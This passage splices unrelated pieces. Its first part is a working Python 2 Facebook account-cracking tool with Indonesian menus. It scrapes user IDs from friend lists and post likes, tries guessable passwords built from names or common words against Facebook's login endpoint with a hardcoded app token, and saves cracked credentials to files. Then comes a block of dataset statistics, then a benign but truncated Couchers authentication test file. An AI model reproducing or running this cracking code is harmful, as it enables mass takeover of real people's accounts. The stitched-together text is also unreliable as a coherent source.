data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m | ' + user + ' • ' + pass6 + ' • ' + c['name']
oks.append(user)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m | ' + user + ' • ' + pass6 + ' • ' + c['name']
cekpoint.append(user)
else:
pass7 = 'Indonesia'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m | ' + user + ' • ' + pass7 + ' • ' + c['name']
oks.append(user)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m | ' + user + ' • ' + pass7 + ' • ' + c['name']
cekpoint.append(user)
else:
pass8 = 'Kontol'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass8)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m | ' + user + ' • ' + pass8 + ' • ' + c['name']
oks.append(user)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m | ' + user + ' • ' + pass8 + ' • ' + c['name']
cekpoint.append(user)
else:
pass9 = 'Sayang'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass9)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m | ' + user + ' • ' + pass9 + ' • ' + c['name']
oks.append(user)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m | ' + user + ' • ' + pass9 + ' • ' + c['name']
cekpoint.append(user)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 45* "\033[1;97m="
print '\033[1;97m[\033[1;91m•\033[1;93m•\033[1;92m•\033[1;97m] \033[1;97mSelesai Dek.....'
print"\033[1;97m[\033[1;91m•\033[1;93m•\033[1;92m•\033[1;97m] \033[1;97mTotal \033[1;92mOK\033[1;97m/\x1b[1;93mCP \033[1;97m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print '\033[1;97m[\033[1;91m•\033[1;93m•\033[1;92m•\033[1;97m] \033[1;97mCP file tersimpan : out/indo1.txt'
print 45* "\033[1;97m="
raw_input("\033[1;97m[\033[1;97m Kembali \033[1;97m]")
os.system("python2 2020.py")
##### CRACK LIKES #####
def crack_likes():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;97m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.system('clear')
print logo
print "\033[1;97m ══════════════════════════════════════════"
tez = raw_input("\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] ID Postingan Group / Teman : ")
r = requests.get("https://graph.facebook.com/"+tez+"/likes?limit=5000&access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
jalan('\r\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] \033[1;97mSukses Mengambil ID \033[1;97m...')
except KeyError:
print"\033[1;97m[\033[1;93m!\033[1;97m] \033[1;97mID Postingan Salah !"
raw_input('\n\033[1;93m[ \033[1;97mKembali \033[1;93m]')
crack_likes()
print "\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] Total ID : "+str(len(id))
print('\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] Stop CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m[\033[1;93m•\033[1;97m] Crack Berjalan Dek "+o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;97m=========================================="
##### MAIN LIKES #####
def main(arg):
sys.stdout.write('\r{}'.format(datetime.now().strftime('\033[1;97m%H:%M:%S')));sys.stdout.flush()
global cekpoint,oks
zowe = arg
try:
os.mkdir('done')
except OSError:
pass
try:
an = requests.get('https://graph.facebook.com/'+zowe+'/?access_token='+toket)
j = json.loads(an.text)
bos1 = j['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print '\033[1;92m | ' + zowe + ' | ' + bos1 + ' | ' + j['name']
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print '\033[1;93m | ' + zowe + ' | ' + bos1 + ' | ' + j['name']
cek = open("done/grup.txt", "a")
cek.write("ID:" +zowe+ " PW:" +bos1+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos2 = j['first_name']+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print '\033[1;92m | ' + zowe + ' | ' + bos2 + ' | ' + j['name']
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print '\033[1;93m | ' + zowe + ' | ' + bos2 + ' | ' + j['name']
cek = open("done/grup.txt", "a")
cek.write("ID:" +zowe+ " PW:" +bos2+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos3 = j['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print '\033[1;92m | ' + zowe + ' | ' + bos3 + ' | ' + j['name']
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print '\033[1;93m | ' + zowe + ' | ' + bos3 + ' | ' + j['name']
cek = open("done/grup.txt", "a")
cek.write("ID:" +zowe+ " PW:" +bos3+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos4 = j['first_name']+'321'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print '\033[1;92m | ' + zowe + ' | ' + bos4 + ' | ' + j['name']
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print '\033[1;93m | ' + zowe + ' | ' + bos4 + ' | ' + j['name']
cek = open("done/grup.txt", "a")
cek.write("ID:" +zowe+ " PW:" +bos4+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos5 = j['last_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print '\033[1;92m | ' + zowe + ' | ' + bos5 + ' | ' + j['name']
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print '\033[1;93m | ' + zowe + ' | ' + bos5 + ' | ' + j['name']
cek = open("done/grup.txt", "a")
cek.write("ID:" +zowe+ " PW:" +bos5+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos6 = 'Anjing'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print '\033[1;92m | ' + zowe + ' | ' + bos6 + ' | ' + j['name']
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print '\033[1;93m | ' + zowe + ' | ' + bos6 + ' | ' + j['name']
cek = open("done/grup.txt", "a")
cek.write("ID:" +zowe+ " PW:" +bos6+"\n")
cek.close()
cekpoint.append(zowe)
except:
pass
p = ThreadPool(20)
p.map(main, id)
print 45* "\033[1;97m="
print '\033[1;97m[\033[1;93m•\033[1;97m] \033[1;97mSelesai ....'
print"\033[1;97m[\033[1;93m•\033[1;97m] \033[1;97mTotal \033[1;92mOK\033[1;97m/\x1b[1;93mCP \033[1;97m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print '\033[1;97m[\033[1;93m•\033[1;97m] \033[1;97mCP file tersimpan : done/grup.txt'
print 45* "\033[1;97m="
raw_input("\033[1;97m[\033[1;97m Kembali \033[1;97m]")
os.system("python2 UNIS3X.py")
######### DUMP ##########
def dump():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
menu()
os.system('clear')
print logo
print "\033[1;97m ══════════════════════════════════════════"
print "\033[1;97m [\033[1;97m01\033[1;97m]\033[1;93m\033[1;97m Ambil ID dari Daftar Teman "
print "\033[1;97m [\033[1;97m02\033[1;97m]\033[1;93m\033[1;97m Ambil ID dari Publik / Teman "
print "\033[1;97m [\033[1;91m00\033[1;97m]\033[1;93m\033[1;97m Kembali "
print "\033[1;97m ══════════════════════════════════════════"
dump_pilih()
def dump_pilih():
cuih = raw_input("\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m]\033[1;97m ")
if cuih =="":
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
dump_pilih()
elif cuih =="1" or cuih =="01":
id_teman()
elif cuih =="2" or cuih =="02":
idfrom_teman()
elif cuih =="0" or cuih =="00":
menu()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m] Isi Yg Benar !"
dump_pilih()
##### ID TEMAN #####
def id_teman():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;97m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('clear')
print logo
print 45* "\033[1;97m="
r=requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;97m[\033[1;93m•\033[1;97m] \033[1;97mMengambil semua ID Teman \033[1;97m...')
bz = open('out/id_teman.txt','w')
for a in z['data']:
idteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[\033[1;93m"+str(len(idteman))+"\033[1;97m]\033[1;97m =>"),;sys.stdout.flush();time.sleep(0.0050)
print '\033[1;97m'+a['id']
bz.close()
print '\r\033[1;97m[\033[1;93m✓\033[1;97m] \033[1;97mSukses Mengambil ID \033[1;97m....'
print"\r\033[1;97m[\033[1;93m•\033[1;97m] \033[1;97mTotal ID : %s"%(len(idteman))
done = raw_input("\r\033[1;97m[\033[1;93m?\033[1;97m] \033[1;97mSimpan Nama File : ")
os.rename('out/id_teman.txt','out/'+done)
print("\r\033[1;97m[\033[1;95m+\033[1;97m] \033[1;97mFile tersimpan : \033[1;97mout/"+done)
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
raw_input("\033[1;93m[ \033[1;97mKembali \033[1;93m]")
os.system("python2 UNIS3X.py")
except IOError:
print"\033[1;91m[!] Gagal membuat file"
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;97m[!] Terhenti !")
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
dump()
except KeyError:
print('\033[1;91m[!] Gagal !')
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
dump()
except OSError:
print('\033[1;97m[\033[1;95m!\033[1;97m]\033[1;97m File anda tidak tersimpan !')
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
os.system("python2 2020.py")
except requests.exceptions.ConnectionError:
print"\033[1;97m[×] Tidak ada koneksi !"
keluar()
##### ID PUBLIK #####
def idfrom_teman():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('clear')
print logo
print "\033[1;97m ══════════════════════════════════════════"
idt = raw_input("\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] User ID Target : ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] \033[1;97mNama Akun : "+op["name"]
except KeyError:
print"\033[1;97m[\033[1;91m•\033[1;93m•\033[1;92m•\033[1;97m] ID Publik Tidak Ada !"
raw_input("\n\033[1;97m[\033[1;97m Kembali \033[1;97m]")
dump()
r=requests.get("https://graph.facebook.com/"+idt+"?fields=friends.limit(50000)&access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] \033[1;97mMengambil Semua ID ...')
print "\033[1;97m ══════════════════════════════════════════"
bz = open('out/id_teman_from_teman.txt','w')
for a in z['friends']['data']:
idfromteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m [ \033[1;97m"+str(len(idfromteman))+"\033[1;97m ]\033[1;91m •\033[1;97m•\033[1;97m"),;sys.stdout.flush();time.sleep(0.0050)
print '\033[1;97m ' + a['id']
bz.close()
print '\r\033[1;97m[\033[1;93m✓\033[1;97m] \033[1;97mSukses Mengambil ID \033[1;97m....'
print"\r\033[1;97m[\033[1;93m•\033[1;97m] Total ID : %s"%(len(idfromteman))
done = raw_input("\r\033[1;97m[\033[1;93m+\033[1;97m] \033[1;97mSimpan Nama File : ")
os.rename('out/id_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[\033[1;95m√\033[1;97m] File tersimpan : out/"+done)
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
dump()
except OSError:
print"\033[1;97m[!] File Tidak Tersimpan "
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
os.system("python2 2020.py")
except IOError:
print"\033[1;97m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
os.system("python2 2020.py")
except (KeyboardInterrupt,EOFError):
print("\033[1;97m[!] Terhenti")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;97m[\033[1;95m!\033[1;97m] Teman tidak ada !')
raw_input("\n\033[1;93m[\033[1;97m Kembali \033[1;93m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;97m[\033[1;91m✖\033[1;97m] Tidak ada koneksi !"
keluar()
#######SAYA########
def saya():
os.system ('clear')
print logo
jalan (' \033[92mAnda Akan Di Arahkan Ke Browser')
os.system('xdg-open https://m.facebook.com/cindy.adelia.330')
menu()
if __name__=='__main__':
menu()
masuk()
| 40.947293
| 305
| 0.582049
| 4,379
| 28,745
| 3.971683
| 0.088605
| 0.105336
| 0.108268
| 0.077622
| 0.819917
| 0.798701
| 0.758395
| 0.724816
| 0.701414
| 0.673011
| 0
| 0.167207
| 0.184623
| 28,745
| 701
| 306
| 41.005706
| 0.538229
| 0.006053
| 0
| 0.580247
| 0
| 0.151235
| 0.50641
| 0.191801
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.075617
| 0.016975
| null | null | 0.212963
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
fe2447d03cbbe79e3c04ee355734e96140b0a61c
| 24,052
|
py
|
Python
|
app/backend/src/tests/test_auth.py
|
anand-prem/couchers
|
ee4e93aacc6331cc22bb496749ca79c2c6474976
|
[
"MIT"
] | null | null | null |
app/backend/src/tests/test_auth.py
|
anand-prem/couchers
|
ee4e93aacc6331cc22bb496749ca79c2c6474976
|
[
"MIT"
] | null | null | null |
app/backend/src/tests/test_auth.py
|
anand-prem/couchers
|
ee4e93aacc6331cc22bb496749ca79c2c6474976
|
[
"MIT"
] | null | null | null |
import http.cookies
import grpc
import pytest
from google.protobuf import empty_pb2
from couchers import errors
from couchers.crypto import hash_password, random_hex
from couchers.db import session_scope
from couchers.models import LoginToken, PasswordResetToken, SignupToken, User, UserSession
from pb import api_pb2, auth_pb2
from tests.test_fixtures import auth_api_session, db, fast_passwords, generate_user, real_api_session, testconfig
@pytest.fixture(autouse=True)
def _(testconfig):
pass
def get_session_cookie_token(metadata_interceptor):
return http.cookies.SimpleCookie(metadata_interceptor.latest_headers["set-cookie"])["couchers-sesh"].value
def test_UsernameValid(db):
with auth_api_session() as (auth_api, metadata_interceptor):
assert auth_api.UsernameValid(auth_pb2.UsernameValidReq(username="test")).valid
with auth_api_session() as (auth_api, metadata_interceptor):
assert not auth_api.UsernameValid(auth_pb2.UsernameValidReq(username="")).valid
def test_basic_signup(db):
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Signup(auth_pb2.SignupReq(email="a@b.com"))
assert reply.next_step == auth_pb2.SignupRes.SignupStep.SENT_SIGNUP_EMAIL
# read out the signup token directly from the database for now
with session_scope() as session:
entry = session.query(SignupToken).filter(SignupToken.email == "a@b.com").one()
signup_token = entry.token
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.SignupTokenInfo(auth_pb2.SignupTokenInfoReq(signup_token=signup_token))
assert reply.email == "a@b.com"
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.CompleteSignup(
auth_pb2.CompleteSignupReq(
signup_token=signup_token,
username="frodo",
name="Räksmörgås",
city="Minas Tirith",
birthdate="1980-12-31",
gender="Robot",
hosting_status=api_pb2.HOSTING_STATUS_CAN_HOST,
lat=1,
lng=1,
radius=100,
accept_tos=True,
)
)
# make sure we got the right token in a cookie
with session_scope() as session:
token = session.query(User, UserSession).filter(User.username == "frodo").one().UserSession.token
assert get_session_cookie_token(metadata_interceptor) == token
def test_basic_login(db):
# Create our test user using signup
test_basic_signup(db)
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Login(auth_pb2.LoginReq(user="frodo"))
assert reply.next_step == auth_pb2.LoginRes.LoginStep.SENT_LOGIN_EMAIL
# backdoor to find login token
with session_scope() as session:
entry = session.query(LoginToken).one()
login_token = entry.token
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.CompleteTokenLogin(auth_pb2.CompleteTokenLoginReq(login_token=login_token))
reply_token = get_session_cookie_token(metadata_interceptor)
with session_scope() as session:
token = (
session.query(UserSession)
.filter(User.username == "frodo")
.filter(UserSession.token == reply_token)
.one_or_none()
)
assert token
# log out
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Deauthenticate(empty_pb2.Empty(), metadata=(("cookie", f"couchers-sesh={reply_token}"),))
def test_login_tokens_invalidate_after_use(db):
test_basic_signup(db)
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Login(auth_pb2.LoginReq(user="frodo"))
assert reply.next_step == auth_pb2.LoginRes.LoginStep.SENT_LOGIN_EMAIL
with session_scope() as session:
login_token = session.query(LoginToken).one().token
with auth_api_session() as (auth_api, metadata_interceptor):
auth_api.CompleteTokenLogin(auth_pb2.CompleteTokenLoginReq(login_token=login_token))
session_token = get_session_cookie_token(metadata_interceptor)
with auth_api_session() as (auth_api, metadata_interceptor), pytest.raises(grpc.RpcError):
# check we can't login again
auth_api.CompleteTokenLogin(auth_pb2.CompleteTokenLoginReq(login_token=login_token))
def test_banned_user(db):
test_basic_signup(db)
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Login(auth_pb2.LoginReq(user="frodo"))
assert reply.next_step == auth_pb2.LoginRes.LoginStep.SENT_LOGIN_EMAIL
with session_scope() as session:
login_token = session.query(LoginToken).one().token
with session_scope() as session:
session.query(User).one().is_banned = True
with auth_api_session() as (auth_api, metadata_interceptor):
with pytest.raises(grpc.RpcError):
auth_api.CompleteTokenLogin(auth_pb2.CompleteTokenLoginReq(login_token=login_token))
def test_deleted_user(db):
test_basic_signup(db)
with session_scope() as session:
session.query(User).one().is_deleted = True
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Login(auth_pb2.LoginReq(user="frodo"))
assert reply.next_step == auth_pb2.LoginRes.LoginStep.INVALID_USER
def test_invalid_token(db):
user1, token1 = generate_user()
user2, token2 = generate_user()
wrong_token = random_hex(32)
with real_api_session(wrong_token) as api, pytest.raises(grpc.RpcError) as e:
res = api.GetUser(api_pb2.GetUserReq(user=user2.username))
assert e.value.code() == grpc.StatusCode.UNAUTHENTICATED
assert e.value.details() == "Unauthorized"
def test_password_reset(db, fast_passwords):
user, token = generate_user(hashed_password=hash_password("mypassword"))
with auth_api_session() as (auth_api, metadata_interceptor):
res = auth_api.ResetPassword(
auth_pb2.ResetPasswordReq(
user=user.username,
)
)
with session_scope() as session:
token = session.query(PasswordResetToken).one().token
with auth_api_session() as (auth_api, metadata_interceptor):
res = auth_api.CompletePasswordReset(auth_pb2.CompletePasswordResetReq(password_reset_token=token))
with session_scope() as session:
user = session.query(User).one()
assert user.hashed_password is None
def test_password_reset_no_such_user(db):
user, token = generate_user()
with auth_api_session() as (auth_api, metadata_interceptor):
res = auth_api.ResetPassword(
auth_pb2.ResetPasswordReq(
user="nonexistentuser",
)
)
with session_scope() as session:
res = session.query(PasswordResetToken).one_or_none()
assert res is None
def test_password_reset_invalid_token(db, fast_passwords):
password = random_hex()
user, token = generate_user(hashed_password=hash_password(password))
with auth_api_session() as (auth_api, metadata_interceptor):
res = auth_api.ResetPassword(
auth_pb2.ResetPasswordReq(
user=user.username,
)
)
with session_scope() as session:
token = session.query(PasswordResetToken).one().token
with auth_api_session() as (auth_api, metadata_interceptor), pytest.raises(grpc.RpcError) as e:
res = auth_api.CompletePasswordReset(auth_pb2.CompletePasswordResetReq(password_reset_token="wrongtoken"))
assert e.value.code() == grpc.StatusCode.NOT_FOUND
assert e.value.details() == errors.INVALID_TOKEN
with session_scope() as session:
user = session.query(User).one()
assert user.hashed_password == hash_password(password)
def test_logout_invalid_token(db):
# Create our test user using signup
test_basic_signup(db)
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Login(auth_pb2.LoginReq(user="frodo"))
assert reply.next_step == auth_pb2.LoginRes.LoginStep.SENT_LOGIN_EMAIL
# backdoor to find login token
with session_scope() as session:
entry = session.query(LoginToken).one()
login_token = entry.token
with auth_api_session() as (auth_api, metadata_interceptor):
auth_api.CompleteTokenLogin(auth_pb2.CompleteTokenLoginReq(login_token=login_token))
reply_token = get_session_cookie_token(metadata_interceptor)
# delete all login tokens
with session_scope() as session:
session.query(LoginToken).delete()
# log out with non-existent token should still return a valid result
with auth_api_session() as (auth_api, metadata_interceptor):
auth_api.Deauthenticate(empty_pb2.Empty(), metadata=(("cookie", f"couchers-sesh={reply_token}"),))
reply_token = get_session_cookie_token(metadata_interceptor)
# make sure we set an empty cookie
assert reply_token == ""
def test_signup_invalid_birthdate(db):
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Signup(auth_pb2.SignupReq(email="a@b.com"))
assert reply.next_step == auth_pb2.SignupRes.SignupStep.SENT_SIGNUP_EMAIL
# read out the signup token directly from the database for now
with session_scope() as session:
entry = session.query(SignupToken).filter(SignupToken.email == "a@b.com").one()
signup_token = entry.token
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.SignupTokenInfo(auth_pb2.SignupTokenInfoReq(signup_token=signup_token))
assert reply.email == "a@b.com"
with auth_api_session() as (auth_api, metadata_interceptor):
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.CompleteSignup(
auth_pb2.CompleteSignupReq(
signup_token=signup_token,
username="frodo",
name="Räksmörgås",
city="Minas Tirith",
birthdate="9999-12-31", # arbitrary future birthdate
gender="Robot",
hosting_status=api_pb2.HOSTING_STATUS_CAN_HOST,
lat=1,
lng=1,
radius=100,
accept_tos=True,
)
)
assert e.value.code() == grpc.StatusCode.INVALID_ARGUMENT
assert e.value.details() == errors.INVALID_BIRTHDATE
reply = auth_api.CompleteSignup(
auth_pb2.CompleteSignupReq(
signup_token=signup_token,
username="ceelo",
name="Christopher",
city="New York City",
birthdate="2000-12-31", # arbitrary birthdate older than 18 years
gender="Helicopter",
hosting_status=api_pb2.HOSTING_STATUS_CAN_HOST,
lat=1,
lng=1,
radius=100,
accept_tos=True,
)
)
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.CompleteSignup(
auth_pb2.CompleteSignupReq(
signup_token=signup_token,
username="franklin",
name="Franklin",
city="Los Santos",
birthdate="2004-04-09", # arbitrary birthdate around 17 years
gender="Male",
hosting_status=api_pb2.HOSTING_STATUS_CAN_HOST,
lat=1,
lng=1,
radius=100,
accept_tos=True,
)
)
assert e.value.code() == grpc.StatusCode.INVALID_ARGUMENT
assert e.value.details() == errors.INVALID_BIRTHDATE
def test_invalid_signup_token_info(db):
with auth_api_session() as (auth_api, metadata_interceptor):
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.SignupTokenInfo(auth_pb2.SignupTokenInfoReq(signup_token="notarealtoken"))
assert e.value.code() == grpc.StatusCode.NOT_FOUND
assert e.value.details() == errors.INVALID_TOKEN
def test_signup_invalid_email(db):
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Signup(auth_pb2.SignupReq(email="a"))
assert reply.next_step == auth_pb2.SignupRes.SignupStep.INVALID_EMAIL
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Signup(auth_pb2.SignupReq(email="a@b"))
assert reply.next_step == auth_pb2.SignupRes.SignupStep.INVALID_EMAIL
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Signup(auth_pb2.SignupReq(email="a@b."))
assert reply.next_step == auth_pb2.SignupRes.SignupStep.INVALID_EMAIL
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Signup(auth_pb2.SignupReq(email="a@b.c"))
assert reply.next_step == auth_pb2.SignupRes.SignupStep.INVALID_EMAIL
def test_signup_existing_email(db):
# Signed up user
user, _ = generate_user()
# Attempt to signup again with the same email
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Signup(auth_pb2.SignupReq(email=user.email))
assert reply.next_step == auth_pb2.SignupRes.SignupStep.EMAIL_EXISTS
def test_successful_authenticate(db, fast_passwords):
user, _ = generate_user(hashed_password=hash_password("password"))
# Authenticate with username
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Authenticate(auth_pb2.AuthReq(user=user.username, password="password"))
assert reply.jailed == False
# Authenticate with email
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Authenticate(auth_pb2.AuthReq(user=user.email, password="password"))
assert reply.jailed == False
def test_unsuccessful_authenticate(db, fast_passwords):
user, _ = generate_user(hashed_password=hash_password("password"))
# Invalid password
with auth_api_session() as (auth_api, metadata_interceptor):
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.Authenticate(auth_pb2.AuthReq(user=user.username, password="incorrectpassword"))
assert e.value.code() == grpc.StatusCode.NOT_FOUND
assert e.value.details() == errors.INVALID_USERNAME_OR_PASSWORD
# Invalid username
with auth_api_session() as (auth_api, metadata_interceptor):
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.Authenticate(auth_pb2.AuthReq(user="notarealusername", password="password"))
assert e.value.code() == grpc.StatusCode.NOT_FOUND
assert e.value.details() == errors.INVALID_USERNAME_OR_PASSWORD
# Invalid email
with auth_api_session() as (auth_api, metadata_interceptor):
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.Authenticate(
auth_pb2.AuthReq(user=f"{random_hex(12)}@couchers.org.invalid", password="password")
)
assert e.value.code() == grpc.StatusCode.NOT_FOUND
assert e.value.details() == errors.INVALID_USERNAME_OR_PASSWORD
# Invalid id
with auth_api_session() as (auth_api, metadata_interceptor):
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.Authenticate(auth_pb2.AuthReq(user="-1", password="password"))
assert e.value.code() == grpc.StatusCode.NOT_FOUND
assert e.value.details() == errors.INVALID_USERNAME_OR_PASSWORD
testing_email = f"{random_hex(12)}@couchers.org.invalid"
# No Password
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Signup(auth_pb2.SignupReq(email=testing_email))
with session_scope() as session:
entry = session.query(SignupToken).filter(SignupToken.email == testing_email).one()
signup_token = entry.token
with auth_api_session() as (auth_api, metadata_interceptor):
